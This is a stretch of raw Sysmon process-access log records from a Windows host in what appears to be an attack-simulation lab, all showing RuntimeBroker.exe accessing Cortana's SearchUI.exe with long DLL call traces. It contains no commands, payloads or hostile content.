System32\RPCRT4.dll+51b0d 10341000x80000000000000001694472Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.460{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+9a0e|C:\Windows\SYSTEM32\ntdll.dll+80974 10341000x80000000000000001694471Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.460{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+9a0e|C:\Windows\SYSTEM32\ntdll.dll+80974|C:\Windows\SYSTEM32\ntdll.dll+1e892 10341000x80000000000000001694470Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.460{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+9a0e|C:\Windows\SYSTEM32\ntdll.dll+80974|C:\Windows\SYSTEM32\ntdll.dll+1e892 10341000x80000000000000001694469Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.460{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+9a0e|C:\Windows\SYSTEM32\ntdll.dll+80974|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001694468Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.460{05ADC7E1-29F2-6039-CB05-00000000AD01}42809192C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694467Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.452{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694466Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.452{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694465Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.452{05ADC7E1-29F2-6039-CB05-00000000AD01}42809192C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694464Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.452{05ADC7E1-29F2-6039-CB05-00000000AD01}42803880C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694463Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.452{05ADC7E1-29F2-6039-CB05-00000000AD01}42803880C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694462Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.452{05ADC7E1-29F2-6039-CB05-00000000AD01}42809192C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694461Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.452{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694460Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.452{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694459Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.410{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001694458Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.410{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694457Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.410{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694456Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.410{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694455Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.410{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694454Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.410{05ADC7E1-29F2-6039-CB05-00000000AD01}42803880C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694453Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 